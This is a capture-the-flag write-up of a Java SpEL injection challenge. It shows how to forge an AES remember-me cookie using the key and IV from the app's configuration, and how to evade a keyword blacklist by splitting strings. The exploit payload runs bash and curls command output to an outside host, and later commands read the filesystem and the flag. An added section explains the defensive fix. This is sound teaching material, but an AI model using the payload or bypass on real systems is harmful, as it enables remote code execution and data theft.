
[Java Code Audit] javacon WriteUp

Date: 2022-10-27 13:33:17  Views: 51
Tags: return String WriteUp getBytes cipher new Java javacon public



Preface

I saw this on P神's Knowledge Planet (星球) and am working through it here. The file is at https://www.leavesongs.com/media/attachment/2018/11/23/challenge-0.0.1-SNAPSHOT.jar

javacon

Run it with java -jar challenge-0.0.1-SNAPSHOT.jar. First, look at the configuration that ships inside the jar:

(screenshot: application configuration)


Start with the login page. The /login handler receives the POST parameters and compares them with the credentials from the configuration; on success it stores the username in the session and, if remember-me was checked, sets a remember-me cookie:

@PostMapping({"/login"})
public String login(@RequestParam(value = "username", required = true) String username,
                    @RequestParam(value = "password", required = true) String password,
                    @RequestParam(value = "remember-me", required = false) String isRemember,
                    HttpSession session, HttpServletResponse response) {
    // Credentials are compared against the values in the configuration file
    if (this.userConfig.getUsername().contentEquals(username) && this.userConfig.getPassword().contentEquals(password)) {
        session.setAttribute("username", username);
        if (isRemember != null && !isRemember.equals("")) {
            // The cookie value comes from encryptRememberMe(): AES-CBC under the configured
            // key and IV (see the Encryptor class below), valid for 30 days
            Cookie c = new Cookie("remember-me", this.userConfig.encryptRememberMe());
            c.setMaxAge(2592000);
            response.addCookie(c);
        }
        return "redirect:/";
    } else {
        return "redirect:/login-error";
    }
}

Log in with RememberMe checked and we are in:

(screenshot: logged in, remember-me cookie set)


Now let's see what the server does with that cookie. First it reads the remember-me value:

(screenshot: code reading the remember-me cookie)


Then look at the function getAdvanceValue:

(screenshot: getAdvanceValue)


First the received value is matched against a blacklist; if any entry matches, an error is thrown:

(screenshot: blacklist check)


If nothing matches, the normal flow continues and the decrypted value is parsed and evaluated as a SpEL expression under SmallEvaluationContext. Note that this is a SpEL expression injection: the cookie content is attacker-controlled (the key and IV used to encrypt it sit in the configuration inside the jar), and the only defence is a keyword blacklist applied to the raw text before evaluation.

(screenshot: SpEL evaluation in SmallEvaluationContext)


So all we need is a payload that gets past the blacklist. The trick is to split each filtered keyword (java.lang, Runtime, exec) with string concatenation: the raw text never contains the forbidden substring, but SpEL joins the pieces when it evaluates the expression. The payload is then encrypted with the key and IV from the configuration, exactly as the server does it, and sent as the remember-me cookie. The Encryptor class below is the one from the jar; the main method builds the cookie value:

import java.util.Base64;
import javax.crypto.Cipher;
import javax.crypto.spec.IvParameterSpec;
import javax.crypto.spec.SecretKeySpec;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;

class Encryptor {
    static Logger logger = LoggerFactory.getLogger(Encryptor.class);

    public Encryptor() {
    }

    // AES-128-CBC with a caller-supplied key and IV, URL-safe Base64 output.
    // The server writes the cookie with exactly this routine, so anyone who knows
    // the key and IV can forge it.
    public static String encrypt(String key, String initVector, String value) {
        try {
            IvParameterSpec iv = new IvParameterSpec(initVector.getBytes("UTF-8"));
            SecretKeySpec skeySpec = new SecretKeySpec(key.getBytes("UTF-8"), "AES");
            Cipher cipher = Cipher.getInstance("AES/CBC/PKCS5PADDING");
            cipher.init(Cipher.ENCRYPT_MODE, skeySpec, iv);      // the decompiler shows the literal 1
            byte[] encrypted = cipher.doFinal(value.getBytes());  // platform default charset, as in the jar
            return Base64.getUrlEncoder().encodeToString(encrypted);
        } catch (Exception var7) {
            logger.warn(var7.getMessage());
            return null;
        }
    }

    // Inverse of encrypt(); this is what the server runs on the incoming cookie
    public static String decrypt(String key, String initVector, String encrypted) {
        try {
            IvParameterSpec iv = new IvParameterSpec(initVector.getBytes("UTF-8"));
            SecretKeySpec skeySpec = new SecretKeySpec(key.getBytes("UTF-8"), "AES");
            Cipher cipher = Cipher.getInstance("AES/CBC/PKCS5PADDING");
            cipher.init(Cipher.DECRYPT_MODE, skeySpec, iv);      // the decompiler shows the literal 2
            byte[] original = cipher.doFinal(Base64.getUrlDecoder().decode(encrypted));
            return new String(original);
        } catch (Exception var7) {
            logger.warn(var7.getMessage());
            return null;
        }
    }
}

public class RMIServer {
    public static void main(String[] args) {
        // Every blacklisted keyword is split with "+" so the raw text never contains it;
        // SpEL concatenates the pieces at evaluation time. The chain is
        // Class.forName("java.lang.Runtime").getMethod("exec", String[].class)
        //      .invoke(Runtime.getRuntime(), new String[]{...}),
        // reached through T(String).getClass() because T(...) gives us a Class object
        // on which the static forName can be called.
        String payload = "#{T(String).getClass().forName(\"java.l\"+\"ang.Ru\"+\"ntime\")"
                + ".getMethod(\"ex\"+\"ec\",T(String[]))"
                + ".invoke(T(String).getClass().forName(\"java.l\"+\"ang.Ru\"+\"ntime\")"
                + ".getMethod(\"getRu\"+\"ntime\")"
                + ".invoke(T(String).getClass().forName(\"java.l\"+\"ang.Ru\"+\"ntime\")),"
                + "new String[]{\"/bin/bash\",\"-c\",\"curl http://xxx?a=`whoami`\"})}";
        // Key and IV are the ones from the application configuration
        System.out.println(Encryptor.encrypt("c0dehack1nghere1", "0123456789abcdef", payload));
    }
}
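To make the two points above concrete (the split-keyword bypass, and why a keyword blacklist in front of a SpEL sink is the wrong control), here is an added, self-contained Java example. It is not code from the challenge jar or from the original post. It assumes spring-expression 5.x on the classpath; the blacklist entries are my assumption for illustration, the challenge loads its own from configuration; StandardEvaluationContext stands in for the challenge's SmallEvaluationContext, which is also an assumption. The payload is a harmless variant that only resolves the Runtime class by name instead of calling exec.

```java
import java.util.regex.Pattern;

import org.springframework.expression.EvaluationContext;
import org.springframework.expression.Expression;
import org.springframework.expression.common.TemplateParserContext;
import org.springframework.expression.spel.SpelEvaluationException;
import org.springframework.expression.spel.standard.SpelExpressionParser;
import org.springframework.expression.spel.support.SimpleEvaluationContext;
import org.springframework.expression.spel.support.StandardEvaluationContext;

public class SpelSinkDemo {
    // ASSUMED blacklist for illustration; the challenge reads its own from configuration.
    static final String[] BLACKLIST = {"java.+lang", "Runtime", "exec.*\\("};

    static final SpelExpressionParser PARSER = new SpelExpressionParser();

    // Regex blacklist over the raw, pre-evaluation text, as in getAdvanceValue
    static boolean passesBlacklist(String val) {
        for (String keyword : BLACKLIST) {
            if (Pattern.compile(keyword).matcher(val).find()) {
                return false;
            }
        }
        return true;
    }

    // Vulnerable shape: untrusted text parsed as a #{...} template and evaluated in a
    // context that still exposes T(...) and reflective method calls.
    // StandardEvaluationContext is an ASSUMED stand-in for SmallEvaluationContext.
    static String vulnerable(String val) {
        if (!passesBlacklist(val)) {
            throw new IllegalArgumentException("blacklisted keyword");
        }
        Expression exp = PARSER.parseExpression(val, new TemplateParserContext());
        EvaluationContext ctx = new StandardEvaluationContext();
        return String.valueOf(exp.getValue(ctx));
    }

    // Hardened: SimpleEvaluationContext has no type locator, so T(...) fails with
    // SpelEvaluationException before any reflection happens, whatever the blacklist says.
    static String hardened(String val) {
        Expression exp = PARSER.parseExpression(val, new TemplateParserContext());
        EvaluationContext ctx = SimpleEvaluationContext.forReadOnlyDataBinding().build();
        return String.valueOf(exp.getValue(ctx));
    }

    public static void main(String[] args) {
        // Literal keywords: the regex blacklist sees "java.lang" and "Runtime" directly
        String plain = "#{T(java.lang.Runtime).getRuntime()}";
        // Same class reached with the keywords split by "+": the raw text contains neither
        // "lang" nor "Runtime", SpEL joins the pieces only at evaluation time
        String split = "#{T(String).getClass().forName(\"java.l\"+\"ang.Ru\"+\"ntime\").getName()}";

        System.out.println("plain passes blacklist: " + passesBlacklist(plain));
        System.out.println("split passes blacklist: " + passesBlacklist(split));
        System.out.println("vulnerable context resolved: " + vulnerable(split));
        try {
            hardened(split);
        } catch (SpelEvaluationException e) {
            System.out.println("hardened context rejected it: " + e.getMessage());
        }
    }
}
```

Run it with spring-expression on the classpath: the split payload is accepted by the blacklist and resolves java.lang.Runtime in the StandardEvaluationContext, while the SimpleEvaluationContext throws on the T() node. The proper fix for the challenge is to stop evaluating cookie contents as an expression at all; where SpEL over user data is unavoidable, a SimpleEvaluationContext limits the blast radius in a way no regex list can.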

Send the cookie and the callback comes in with the output of whoami:

(screenshot: callback received with the whoami output)


List the root directory with ls /|base64. The command output travels in the URL query string, so whitespace and newlines in it would be split off and lost; Base64 keeps it as one token. (Standard Base64 still contains + and =, which URL decoding may mangle; if the dump comes back corrupted, use base64 -w0 | tr '+/' '-_' instead.)

(screenshot: ls / output)


Then read the flag with cat /flag:

(screenshot: flag)


From: https://blog.51cto.com/u_15847702/5800906
